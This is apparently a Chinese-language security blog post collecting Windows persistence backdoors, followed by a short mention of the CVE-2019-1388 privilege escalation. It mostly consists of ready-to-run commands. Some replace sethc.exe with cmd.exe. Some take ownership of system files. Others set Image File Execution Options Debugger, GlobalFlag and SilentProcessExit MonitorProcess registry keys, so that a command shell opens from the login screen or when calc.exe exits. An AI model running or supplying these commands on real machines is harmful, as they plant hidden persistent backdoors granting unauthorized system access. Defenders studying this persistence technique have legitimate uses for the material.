使用GlobalFlags劫持任意进程镜像持久化/sethc.exe在不同版本后门应用整理

[toc]

windows 2k3

单条命令执行

windows 2003/xp
这种方式就比较普遍了
利用copy来替换sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\sethc2.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

windows 2008/win7

单条命令执行

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f

或者还可以使用上面的功能。不过需要修改权限。
所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)

takeown /f c:\windows\system32\sethc.*   /a /r /d y
cacls  c:\windows\system32\sethc.*  /T /E /G administrators:F

多条命令执行

在看到近期一个表哥发的文章可以利用映像劫持的方式留shift后门，在5下shift后成功弹出了sethc，然后还可以在执行恶意文件
其中利用的方式

Shfit映像劫持后门新玩法

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1  /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

Global Flags劫持任意exe镜像

上面的文章中提到了Globalflags，这个工具是包含在 Debugging Tools for Windows(WinDbg)下的。
本地可以利用winsdk_web.exe去安装。

点击应用后在打开notepad后

这里是利用gflags的监视进程把监视进程设置成cmd.exe,原理就是修改了三个注册表内容，添加了MonitorProcess的键值。

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v ReportingMode /t REG_DWORD /d 1  /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
https://payloads.cn/2019/1205/shfit-image-hijacks-backdoor-new-gameplay.html
https://www.anquanke.com/post/id/151425

谢谢wing大佬给的思路

细节过几天在发出来。

CVE-2019-1388本地提权复现

https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege

看到有人发，就找了下问题的exe是早期签名带签名组织的地址，有点逻辑漏洞的意思。
hhupd.exe-1999年签名的版本。
https://www.help-info.de/en/Help_Info_HTMLHelp/hh_download_install.htm